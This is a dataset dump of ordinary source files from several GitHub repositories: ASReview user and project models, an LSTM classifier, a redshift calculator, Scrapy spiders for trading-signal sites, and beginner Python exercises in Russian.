bool(identifier):\n raise ValueError(\"Identifier is required\")\n return identifier\n\n @validates(\"origin\")\n def validate_origin(self, _key, origin):\n if not bool(origin):\n raise ValueError(\"Origin is required\")\n return origin\n\n @validates(\"name\")\n def validate_name(self, _key, name):\n if not bool(name):\n raise ValueError(\"Name is required\")\n elif len(name) < 3:\n raise ValueError(\"Name must contain more than 2 characters\")\n return name\n\n @validates(\"email\")\n def validate_email(self, key, email):\n if key == \"email\" and self.origin == \"asreview\":\n if bool(email) is False:\n raise ValueError(\"Email is required when origin is 'asreview'\")\n elif not User.valid_email(email):\n raise ValueError(f\"Email address '{email}' is not valid\")\n return email\n\n def __init__(\n self,\n identifier,\n origin=\"asreview\",\n email=None,\n name=None,\n affiliation=None,\n password=None,\n confirmed=False,\n public=True,\n ):\n self.identifier = identifier\n self.origin = origin\n self.email = email\n self.name = name\n self.affiliation = affiliation\n if self.origin == \"asreview\":\n self.hashed_password = User.create_password_hash(password)\n self.confirmed = confirmed\n self.public = public\n\n def update_profile(self, email, name, affiliation, password=None, public=True):\n self.email = email\n self.name = name\n self.affiliation = affiliation\n if self.origin == \"asreview\" and password is not None:\n self.hashed_password = User.create_password_hash(password)\n self.public = public\n\n return self\n\n def reset_password(self, new_password):\n if self.origin == \"asreview\":\n self.hashed_password = User.create_password_hash(new_password)\n # reset token\n self.token = None\n self.token_created_at = None\n return self\n\n def set_token_data(self, secret, salt):\n \"\"\"Set token data (used in email verification after\n init, and for forgot-password\"\"\"\n token, token_created_at = User.generate_token_data(secret, salt, self.email)\n self.token = token\n self.token_created_at = token_created_at\n return self\n\n def verify_password(self, password):\n \"\"\"Verify password\"\"\"\n if bool(self.hashed_password):\n return check_password_hash(self.hashed_password, password)\n else:\n return False\n\n def get_name(self):\n \"\"\"Get name-ish thing from user account\"\"\"\n name = self.name or self.email\n return name\n\n def summarize(self):\n \"\"\"Summarize user account in frontend data packet\"\"\"\n return {\"id\": self.id, \"name\": self.get_name(), \"email\": self.email}\n\n def confirm_user(self):\n \"\"\"This function confirms a user by setting the confirmed\n field to True and removes the token data\"\"\"\n self.confirmed = True\n self.token = None\n self.token_created_at = None\n return self\n\n def token_valid(self, provided_token, max_hours=24):\n \"\"\"Checks whether provided token is correct and still valid\"\"\"\n # there must be a token and a timestamp\n if bool(self.token) and bool(self.token_created_at):\n # what is now\n now = dt.datetime.utcnow()\n # get time-difference in hours\n diff = (now - self.token_created_at).total_seconds()\n # return if token is correct and we are still before deadline\n return self.token == provided_token and diff <= max_hours * 3600\n else:\n return False\n\n @classmethod\n def generate_token_data(cls, secret, salt, email):\n \"\"\"Generate a token for verification by email\"\"\"\n serializer = URLSafeTimedSerializer(secret)\n token = serializer.dumps(email, salt=salt)\n created_at = dt.datetime.utcnow()\n return token, created_at\n\n @classmethod\n def valid_password(cls, password):\n return re.fullmatch(PASSWORD_REGEX, password)\n\n @classmethod\n def valid_email(cls, email):\n return re.fullmatch(EMAIL_REGEX, email)\n\n @classmethod\n def create_password_hash(cls, password):\n if bool(password) and User.valid_password(password):\n return generate_password_hash(password)\n else:\n raise ValueError(f'Password \"{password}\" does not meet requirements')\n\n def __repr__(self):\n return f\"<User {self.email!r}, id: {self.id}>\"\n\n\nclass Collaboration(DB.Model):\n __tablename__ = \"collaborations\"\n id = Column(Integer, primary_key=True)\n user_id = Column(\n Integer,\n ForeignKey(\"users.id\", ondelete=\"cascade\"),\n nullable=False\n )\n project_id = Column(\n Integer,\n ForeignKey(\"projects.id\", ondelete=\"cascade\"),\n nullable=False\n )\n # make sure we have unique records in this table\n __table_args__ = (UniqueConstraint(\"project_id\", \"user_id\", name=\"unique_records\"),)\n\n def __repr__(self):\n return f\"<Collaboration project:{self.project_id} user:{self.user_id}>\"\n\n\nclass Project(DB.Model):\n \"\"\"Project table\"\"\"\n\n __tablename__ = \"projects\"\n id = Column(Integer, primary_key=True)\n project_id = Column(String(250), nullable=False, unique=True)\n owner_id = Column(Integer, ForeignKey(User.id), nullable=False)\n owner = relationship(\"User\", back_populates=\"projects\")\n\n # do not delete cascade: we don't want to\n # lose users, only collaborations\n collaborators = relationship(\n \"User\", secondary=\"collaborations\", back_populates=\"involved_in\"\n )\n pending_invitations = relationship(\n \"User\",\n secondary=\"collaboration_invitations\",\n back_populates=\"pending_invitations\",\n )\n\n @property\n def project_path(self):\n \"\"\"Returns full project path\"\"\"\n return Path(utils.asreview_path(), self.project_id)\n\n @property\n def folder(self):\n \"\"\"Returns foldername (which is the project_id)\"\"\"\n return self.project_id\n\n def __repr__(self):\n return f\"<Project id: {self.project_id}, owner_id: {self.owner_id}>\"\n\n\nclass CollaborationInvitation(DB.Model):\n \"\"\"Colleboration invitations\"\"\"\n\n __tablename__ = \"collaboration_invitations\"\n id = Column(Integer, primary_key=True)\n project_id = Column(\n Integer,\n ForeignKey(\"projects.id\", ondelete=\"cascade\"),\n nullable=False\n )\n user_id = Column(\n Integer,\n ForeignKey(\"users.id\", ondelete=\"cascade\"),\n nullable=False\n )\n # make sure we have unique records in this table\n __table_args__ = (UniqueConstraint(\"project_id\", \"user_id\", name=\"unique_records\"),)\n\n def __repr__(self):\n pid = self.project_id\n uid = self.user_id\n return f\"<CollaborationInvitation project:{pid} user:{uid}>\"\n" }, { "alpha_fraction": 0.7997266054153442, "alphanum_fraction": 0.8092959523200989, "avg_line_length": 44.71875, "blob_id": "d336b4012276a5f67291a06ecbf27006f5bdab29", "content_id": "56ea7cabd85912c2841808233cd9967b7a82c6ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "permissive", "max_line_length": 78, "num_lines": 32, "path": "/asreview/models/feature_extraction/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.feature_extraction.doc2vec import Doc2Vec\nfrom asreview.models.feature_extraction.embedding_idf import EmbeddingIdf\nfrom asreview.models.feature_extraction.embedding_lstm import EmbeddingLSTM\nfrom asreview.models.feature_extraction.sbert import SBERT\nfrom asreview.models.feature_extraction.tfidf import Tfidf\nfrom asreview.models.feature_extraction.utils import get_feature_class\nfrom asreview.models.feature_extraction.utils import get_feature_model\nfrom asreview.models.feature_extraction.utils import list_feature_extraction\n\n\"\"\"Feature extraction converts texts into features.\n\nFeature extraction is the process of converting a list of texts into some kind\nof feature matrix.\n\nThere are several feature extraction algorithms available. In configuration\nfiles, parameters are found under the section ``[feature_param]``.\n\n\"\"\"\n" }, { "alpha_fraction": 0.6107178926467896, "alphanum_fraction": 0.6215874552726746, "avg_line_length": 28.969696044921875, "blob_id": "29146195cef3c5f7935bb70d13a0c83b6e5bbba7", "content_id": "a88779a2244139e066cef2245c96531a1e905055", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7912, "license_type": "permissive", "max_line_length": 80, "num_lines": 264, "path": "/asreview/models/classifiers/lstm_base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\ntry:\n import tensorflow as tf\n from tensorflow.keras import optimizers\n from tensorflow.keras.layers import LSTM\n from tensorflow.keras.layers import Dense\n from tensorflow.keras.layers import Embedding\n from tensorflow.keras.models import Sequential\nexcept ImportError:\n TF_AVAILABLE = False\nelse:\n TF_AVAILABLE = True\n try:\n tf.logging.set_verbosity(tf.logging.ERROR)\n except AttributeError:\n logging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\n\nimport numpy as np\nimport scipy\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\nfrom asreview.models.classifiers.utils import _set_class_weight\n\n\ndef _check_tensorflow():\n if not TF_AVAILABLE:\n raise ImportError(\"Install tensorflow package to use\" \" LSTM-base.\")\n\n\nclass LSTMBaseClassifier(BaseTrainClassifier):\n \"\"\"LSTM-base classifier (``lstm-base``).\n\n LSTM model that consists of an embedding layer, LSTM layer with one\n output, dense layer, and a single sigmoid output node. Use the\n :class:`asreview.models.feature_extraction.EmbeddingLSTM` feature extraction\n method. Currently not so well optimized and slow.\n\n .. note::\n\n This model requires ``tensorflow`` to be installed. Use ``pip install\n tensorflow`` or install all optional ASReview dependencies with ``pip\n install asreview[all]``\n\n Arguments\n ---------\n embedding_matrix: numpy.ndarray\n Embedding matrix to use with LSTM model.\n backwards: bool\n Whether to have a forward or backward LSTM.\n dropout: float\n Value in [0, 1.0) that gives the dropout and recurrent\n dropout rate for the LSTM model.\n optimizer: str\n Optimizer to use.\n lstm_out_width: int\n Output width of the LSTM.\n learn_rate: float\n Learn rate multiplier of default learning rate.\n dense_width: int\n Size of the dense layer of the model.\n verbose: int\n Verbosity.\n batch_size: int\n Size of the batch size for the LSTM model.\n epochs: int\n Number of epochs to train the LSTM model.\n shuffle: bool\n Whether to shuffle the data before starting to train.\n class_weight: float\n Class weight for the included papers.\n \"\"\"\n\n name = \"lstm-base\"\n label = \"LSTM classic\"\n\n def __init__(\n self,\n embedding_matrix=None,\n backwards=True,\n dropout=0.4,\n optimizer=\"rmsprop\",\n lstm_out_width=20,\n learn_rate=1.0,\n dense_width=128,\n verbose=0,\n batch_size=32,\n epochs=35,\n shuffle=False,\n class_weight=30.0,\n ):\n \"\"\"Initialize the LSTM base model\"\"\"\n super(LSTMBaseClassifier, self).__init__()\n self.embedding_matrix = embedding_matrix\n self.backwards = backwards\n self.dropout = dropout\n self.optimizer = optimizer\n self.lstm_out_width = lstm_out_width\n self.learn_rate = learn_rate\n self.dense_width = dense_width\n self.verbose = verbose\n self.batch_size = batch_size\n self.epochs = epochs\n self.shuffle = shuffle\n self.class_weight = class_weight\n self._model = None\n self.sequence_length = None\n\n def fit(self, X, y):\n # check is tensorflow is available\n _check_tensorflow()\n\n if scipy.sparse.isspmatrix(X):\n X = X.toarray()\n\n sequence_length = X.shape[1]\n if self._model is None or sequence_length != self.sequence_length:\n self.sequence_length = sequence_length\n self._model = _create_lstm_base_model(\n embedding_matrix=self.embedding_matrix,\n backwards=self.backwards,\n dropout=self.dropout,\n optimizer=self.optimizer,\n max_sequence_length=self.sequence_length,\n lstm_out_width=self.lstm_out_width,\n dense_width=self.dense_width,\n learn_rate=self.learn_rate,\n verbose=self.verbose,\n )\n\n self._model.fit(\n X,\n y,\n batch_size=self.batch_size,\n epochs=self.epochs,\n shuffle=self.shuffle,\n class_weight=_set_class_weight(self.class_weight),\n verbose=self.verbose,\n )\n\n def predict_proba(self, X):\n if scipy.sparse.issparse(X):\n X = X.toarray()\n pos_pred = self._model.predict(X, verbose=self.verbose)\n neg_pred = 1 - pos_pred\n return np.hstack([neg_pred, pos_pred])\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_dropout\": hp.uniform(\"mdl_dropout\", 0, 0.9),\n \"mdl_lstm_out_width\": hp.quniform(\"mdl_lstm_out_width\", 1, 50, 1),\n \"mdl_dense_width\": hp.quniform(\"mdl_dense_width\", 1, 200, 1),\n \"mdl_learn_rate_mult\": hp.lognormal(\"mdl_learn_rate_mult\", 0, 1),\n }\n return hyper_space, hyper_choices\n\n @property\n def default_param(self):\n defaults = super(LSTMBaseClassifier, self).default_param\n defaults.pop(\"embedding_matrix\")\n return defaults\n\n\ndef _create_lstm_base_model(\n embedding_matrix,\n backwards=True,\n dropout=0.4,\n optimizer=\"rmsprop\",\n max_sequence_length=1000,\n lstm_out_width=20,\n dense_width=128,\n learn_rate=1.0,\n verbose=1,\n):\n \"\"\"Return callable lstm model.\n Returns\n -------\n callable:\n A function that return the Keras Sklearn model when\n called.\n\n \"\"\"\n\n # check is tensorflow is available\n _check_tensorflow()\n\n model = Sequential()\n\n # add first embedding layer with pretrained wikipedia weights\n model.add(\n Embedding(\n embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=max_sequence_length,\n trainable=False,\n )\n )\n\n # add LSTM layer\n model.add(\n LSTM(\n lstm_out_width,\n input_shape=(max_sequence_length,),\n go_backwards=backwards,\n dropout=dropout,\n recurrent_dropout=dropout,\n )\n )\n\n # add Dense layer with relu activation\n model.add(\n Dense(\n dense_width,\n activation=\"relu\",\n )\n )\n\n # add Dense layer\n model.add(Dense(1, activation=\"sigmoid\"))\n\n optimizer_fn = _get_optimizer(optimizer, learn_rate)\n\n # Compile model\n model.compile(\n loss=\"binary_crossentropy\", optimizer=optimizer_fn, metrics=[\"acc\"]\n )\n\n if verbose >= 1:\n model.summary(verbose=verbose)\n\n return model\n\n\ndef _get_optimizer(optimizer, lr_mult=1.0):\n \"Get optimizer with correct learning rate.\"\n if optimizer == \"sgd\":\n return optimizers.SGD(learning_rate=0.01 * lr_mult)\n elif optimizer == \"rmsprop\":\n return optimizers.RMSprop(learning_rate=0.001 * lr_mult)\n elif optimizer == \"adagrad\":\n return optimizers.Adagrad(learning_rate=0.01 * lr_mult)\n elif optimizer == \"adam\":\n return optimizers.Adam(learning_rate=0.001 * lr_mult)\n elif optimizer == \"nadam\":\n return optimizers.Nadam(learning_rate=0.002 * lr_mult)\n raise NotImplementedError\n" }, { "alpha_fraction": 0.6251012086868286, "alphanum_fraction": 0.6299595236778259, "avg_line_length": 12.722222328186035, "blob_id": "b6fcf148b5f3c96c78a55ac313445ba1215daffa", "content_id": "e81ce06300a7756d63e1a95da3d6dab5ba6a73b3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1235, "license_type": "permissive", "max_line_length": 74, "num_lines": 90, "path": "/docs/source/index.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "ASReview LAB: Active learning for Systematic Reviews\n====================================================\n\nWelcome to the ASReview LAB Documentation!\n\n\n.. toctree::\n :maxdepth: 1\n\n about\n\n research\n\n contribute\n\nQuestions can be asked on `GitHub Discussions\n<https://github.com/asreview/asreview/discussions>`__. For bug reports and\nfeature requests, please submit an issue on `GitHub\n<https://github.com/asreview/asreview/issues/new/choose>`__.\n\n.. toctree::\n :maxdepth: 1\n :caption: Install and Upgrade\n\n installation\n\n start\n\n troubleshooting\n\n\n.. toctree::\n :maxdepth: 1\n :caption: Data\n\n data\n\n data_format\n\n data_labeled\n\n\n.. toctree::\n :maxdepth: 1\n :caption: Screening and Projects\n\n project_create\n\n screening\n\n progress\n\n manage\n\n extensions_overview\n\n.. toctree::\n :maxdepth: 1\n :caption: Simulation\n\n simulation_overview\n\n simulation_webapp\n\n simulation_cli\n\n simulation_results\n\n simulation_api_example\n\n.. toctree::\n :maxdepth: 1\n :caption: Development\n\n overview_development\n\n cli\n\n example_api_asreview_file\n\n extensions_dev\n\n reference\n\n\nIndices and tables\n------------------\n\n- :ref:`genindex`\n- :ref:`modindex`\n" }, { "alpha_fraction": 0.5691699385643005, "alphanum_fraction": 0.6561264991760254, "avg_line_length": 24.299999237060547, "blob_id": "ee4635d1b31bae448fe7d1d833ea92da939134f0", "content_id": "5863532ebcbf63183170b75e0cb499ed46fa85d2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 253, "license_type": "permissive", "max_line_length": 59, "num_lines": 10, "path": "/asreview/webapp/src/icons/PlusIcon.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport SvgIcon from \"@mui/material/SvgIcon\";\n\nexport default function PlusIcon(props) {\n return (\n <SvgIcon {...props} viewBox=\"0 0 24 24\">\n <path d=\"M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6v2z\"></path>\n </SvgIcon>\n );\n}\n" } ]
201
cwhayes/redshift
https://github.com/cwhayes/redshift
b1e349b383f0b8b0ce95e261b022af831f88f6c6
572fbd9f4cae66ad3d2985f0fde56d8516f6c0de
5cc7cc40f33a33d71a04e07b0252344e9cedc1f2
refs/heads/master
2020-05-25T17:27:45.589541
2019-05-21T20:28:04
2019-05-21T20:28:04
187,908,556
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.584269642829895, "alphanum_fraction": 0.5941011309623718, "avg_line_length": 18.72222137451172, "blob_id": "1acb3dec93d2c8d22c35f60f0a48eaa069a40891", "content_id": "7869e89498c7052a7f9823d285ec67b9daf22e5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 65, "num_lines": 36, "path": "/redshift.py", "repo_name": "cwhayes/redshift", "src_encoding": "UTF-8", "text": "from __future__ import print_function, division\nimport numpy as np\n\nwhile True:\n\n\tto_calc = raw_input('What would you like to calculate? (z/d): ')\n\n\tif (to_calc == 'd'):\n\t\tz = float(raw_input('Value of z: '))\n\n\t\tH = 65\n\t\tc = 3 * 10**5\n\t\n\t\tv = z * c\n\n\t\td = v / H\n\n\t\tprint('The distance is', d, 'Mpc.')\n\n\telif (to_calc == 'z'):\n\t\torig = float(raw_input('Original wavelength: '))\n\t\tnew = float(raw_input('Shifted wavelength: '))\n\t\tdelta = new - orig\n\t\tz = np.abs(delta / orig)\n\t\n\t\tif (delta > 0):\n\t\t\tprint('Your object has a redshift of', z)\n\t\telse:\n\t\t\tprint('Your object has a blueshift of', z)\n\n\ttocontinue = raw_input('Would you like to do another? (y/n) ')\n\n\tif (tocontinue == 'y'):\n\t\tcontinue\n\telse:\n\t\tbreak\n\t\n" } ]
1
hyunsub-h/SocialTrading
https://github.com/hyunsub-h/SocialTrading
e7a185068d87f4762100336b4cd4f9273e35dbe0
fa292ea5fba6609fbc5b529011c3bc1fd22a1657
439118dcfda6b283ac4daab209165fc51790339f
refs/heads/master
2018-03-26T16:57:31.714655
2017-06-01T21:09:02
2017-06-01T21:09:02
87,149,050
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 13.666666984558105, "blob_id": "03972f9597340ac84ddec1fa1e56835e70cf2ef6", "content_id": "db9f378afb9aa1b998072a510fad1ed719967a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/README.md", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# SocialTrading\n\nScrape data from social trade platforms.\n\n## Dependency\npython: Scrapy" }, { "alpha_fraction": 0.6369160413742065, "alphanum_fraction": 0.6433725953102112, "avg_line_length": 37.130435943603516, "blob_id": "d6955c328fcceb520d1e35abe28f64baaf2e2bfe", "content_id": "7f4d26c074b70b7a17b6ede9c723722db93a7443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2633, "license_type": "no_license", "max_line_length": 174, "num_lines": 69, "path": "/socialtrading/socialtrading/spiders/mql_spider.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nuser_data = {}\n\ndef none_or_empty(text):\n return str(text) if text != None else \"\"\n\nclass TraderSpider(scrapy.Spider):\n name = \"mql_spider\"\n\n\n def start_requests(self):\n urls = [\n 'https://www.mql5.com/en/signals/mt4', \n 'https://www.mql5.com/en/signals/mt5',\n# 'https://www.mql5.com/en/signals/257977',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.generate_signal_list_page_from_main_page)\n\n with open(\"result.json\", 'w') as f:\n json.dump(user_data, f)\n\n def generate_signal_list_page_from_main_page(self, response):\n page_length = int(response.css(\"span.paginatorEx\").xpath(\"descendant::a\")[-1].xpath(\"text()\").extract_first())\n for index in xrange(1, page_length + 1):\n url = response.url + \"/page\" + str(index)\n yield scrapy.Request(url=url, callback=self.generate_signal_page_from_signal_list)\n\n def generate_signal_page_from_signal_list(self, response):\n for signal_element in response.css(\"div.signal\"):\n url = signal_element.xpath(\"descendant::a [@href]\")[1].xpath(\"@href\").extract_first()\n yield scrapy.Request(url=url, callback=self.parse_signal_page) \n\n def parse_signal_page(self, response):\n trading_data = {}\n\n user_name = response.css('h1.title-min').xpath(\"descendant::a\").xpath(\"text()\").extract_first()\n \n trading_data_element_list = response.css('div.signalsTradeData')\n\n for trading_data_element in trading_data_element_list:\n for metric_element in trading_data_element.xpath(\"descendant::div [@title]\"):\n metric_name = metric_element.xpath(\"text()\").extract_first().strip().strip(\":\")\n if metric_name == \"\":\n # growth\n metric_name = metric_element.xpath(\"descendant::text()\").extract_first()\n value = metric_element.xpath(\"descendant::i/text()\").extract_first()\n else:\n value = none_or_empty(metric_element.xpath(\"descendant::i/text()\").extract_first()) + none_or_empty(metric_element.xpath(\"descendant::span/text()\").extract_first())\n\n trading_data[metric_name] = value\n\n user_data[user_name] = trading_data\n\n\"\"\"\n def parse(self, response):\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n next_page_url = response.css(\"li.next > a::attr(href)\").extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\"\"\"\n\n\n" }, { "alpha_fraction": 0.6115702390670776, "alphanum_fraction": 0.6136363744735718, "avg_line_length": 26.600000381469727, "blob_id": "786c36c295d3f25f114c56b9e53a29e9729b2d07", "content_id": "b26408b86dc6fae6720da445044026195ed9d31c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 968, "license_type": "no_license", "max_line_length": 75, "num_lines": 35, "path": "/socialtrading/socialtrading/spiders/zulu_spider.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass TraderSpider(scrapy.Spider):\n name = \"zulu_spider\"\n\n\n def start_requests(self):\n urls = [\n 'https://socialtrading.zulutrade.com/traders#forex',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n\n def parse(self, response):\n page = response.url.split(\"/\")[-2]\n filename = 'traderss-%s.html' % page\n with open(filename, 'wb') as f:\n f.write(response.body)\n self.log('Saved file %s' % filename)\n\"\"\"\n def parse(self, response):\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n next_page_url = response.css(\"li.next > a::attr(href)\").extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\"\"\"\n\n\n" }, { "alpha_fraction": 0.6337078809738159, "alphanum_fraction": 0.649438202381134, "avg_line_length": 26.8125, "blob_id": "706e9aaf66daa9d5eda6ef5612dc717cc23204d1", "content_id": "933e9ce840e44ac95fbb2d990635c42649d33bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 890, "license_type": "no_license", "max_line_length": 195, "num_lines": 32, "path": "/socialtrading/socialtrading/spiders/zulu_spider2.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nimport json\n\nclass TraderSpider(scrapy.Spider):\n name = \"zulu_spider2\"\n\n def start_requests(self):\n time_frame = 100000\n page_num = 0\n trading_size = 10000\n\n trader_id = []\n filename\n\n with open(filename, 'r') as f:\n trader_id = f.read().strip('\\n\\r')\n\n urls = []\n for trader_id in trader_ids:\n url = 'https://www.zulutrade.com/zulutrade-client/traders/api/providers/%d/tradeHistory?timeframe=%d&page=%d&size=%d&sort=date_closed,desc' % (trader_id, time_frame, page_num, trading_size)\n trading_data = json.loads(requests.get(url).text)\n with open('%d_trade.json' % (trader_id), 'w') as f:\n json.dump(trading_data, f) \n\n\n # articial one call to make scrapy work\n yield scrapy.Request(url=url, callback=self.parse_signal_page)\n\n def parse_signal_page(self, response):\n pass\n" } ]
4
StasNovikov/simple-games-on-Python
https://github.com/StasNovikov/simple-games-on-Python
9bcc27ea4996e3bdee6223050d655f88b9892fb2
8c8778904f24b1134b157982f703d5675a599ebe
1cc9fd3cca1239f30619d7e470c635d7cc2dcce9
refs/heads/master
2018-02-09T04:36:25.187958
2017-08-03T16:41:48
2017-08-03T16:41:48
96,676,422
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6912209987640381, "alphanum_fraction": 0.7053481340408325, "avg_line_length": 44.09090805053711, "blob_id": "981aee02c57f6c17b949d28a35e3b3fff1567179", "content_id": "4810c8493adb1110ab613a0bfe717c3d38b2a884", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1485, "license_type": "no_license", "max_line_length": 100, "num_lines": 22, "path": "/useless_trivia.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Бесполезные факты\n#\n# Узнает у пользователя его / ее личне данные и выдает несколько фактов\n# о нем / ней. Эти факты истинны, но совершенно бесполезны.\n\nname = input(\"Привет! Как тебя зовут?\");\nage = int(input(\"Сколько тебе лет?\"))\nweight = int(input(\"Хорошо. И последний вопрос. Сколько в тебе килограммов?\"))\nprint(\"\\nЕсли бы поэт Каммингс адресовал тебе письмо, он бы обратился к тебе так: \", name.lower())\nprint(\"А если бы это был рехнувшийся Каммингс, то так: \", name.upper())\ncalled = name * 5\nprint(\"\\nЕсли бы маленький ребёнок решил привлечь твоё внимание,\")\nprint(\"он произнёс бы твоё имя так:\")\nprint(called)\nseconds = age * 365 * 24 * 60 * 60\nprint(\"\\nТвой нынешний возраст - свыше \", seconds, \" секунд.\")\n\nmoon_weight = weight / 6\nprint(\"\\nЗнаете ли вы, что на Луне вы весили бы всего \", moon_weight, \" кг?\")\nsun_weight = weight * 27.1\nprint(\"А вот на Солнце, вы бы весили \", sun_weight, \" кг. (Но увы, это продолжалось бы недолго...)\")\ninput(\"\\n\\nНажмите Enter, чтобы выйти.\")" }, { "alpha_fraction": 0.7006980776786804, "alphanum_fraction": 0.7015706896781921, "avg_line_length": 26.975608825683594, "blob_id": "6c3e5aea47d7a6f5e0755eccb7cf9bd83c342c2d", "content_id": "95da4b65a2ad35b6f4c2ce2ab0813504c96c6f26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1587, "license_type": "no_license", "max_line_length": 69, "num_lines": 41, "path": "/ORWCFile/pickle_it.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Консервация данных в файд\n# Демонстрирует консервацию данных и доступ к ним\n\nimport pickle, shelve\n\nprint(\"Консервация списков\")\nvariety = [\"огурцы\",\"помидора\",\"капуста\"]\nshape = [\"целые\",\"кубиками\",\"соломкой\"]\nbrand = [\"Главпродукт\",\"Чумак\",\"Бондюэль\"]\n\n# Запись двоичных данных в файл\n# Для этого используется режим доступа - wb\nf = open(\"pickles.dat\",\"wb\")\n\n# Функция pickle.dump() - предназначена для консервации данных в файл\npickle.dump(variety, f)\npickle.dump(shape, f)\npickle.dump(brand, f)\nf.close()\nprint(\"\\nРасконсервация списков\")\nf = open(\"pickles.dat\",\"rb\")\nvariety = pickle.load(f)\nshape = pickle.load(f)\nbrand = pickle.load(f)\nprint(variety)\nprint(shape)\nprint(brand)\nf.close()\n\nprint(\"\\nПомещение списков на полку\")\ns = shelve.open(\"pickles2.dat\")\ns[\"variety\"] = [\"огурцы\",\"помидора\",\"капуста\"]\ns[\"shape\"] = [\"целые\",\"кубиками\",\"соломкой\"]\ns[\"brand\"] = [\"Главпродукт\",\"Чумак\",\"Бондюэль\"]\ns.sync() # Убедимся, что данные записаны\nprint(\"\\nИзвлечение списков из файла полки\")\nprint(\"Торговые марки - \", s[\"brand\"])\nprint(\"Формы - \", s[\"shape\"])\nprint(\"Виды овощей - \", s[\"variety\"])\ns.close()\ninput(\"Press the enter key to exit\")" }, { "alpha_fraction": 0.5471547842025757, "alphanum_fraction": 0.5582968592643738, "avg_line_length": 24.653060913085938, "blob_id": "8372cf8b44f904788987bd14d12d0d23f50550a1", "content_id": "0791c892a107a53b6a29b639672a9df8a12f665a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 76, "num_lines": 98, "path": "/OOP/playing_cards2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Карты 2.0\n# Демонстрирует расширение класса через наследование\nclass Card(object):\n \"\"\" Одна игральая карта \"\"\"\n RANKS = [\"A\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\"]\n SUITS = [\"c\",\"d\",\"h\",\"s\"]\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def __str__(self):\n rep = self.rank + self.suit\n return rep\n\nclass Hand(object):\n \"\"\" 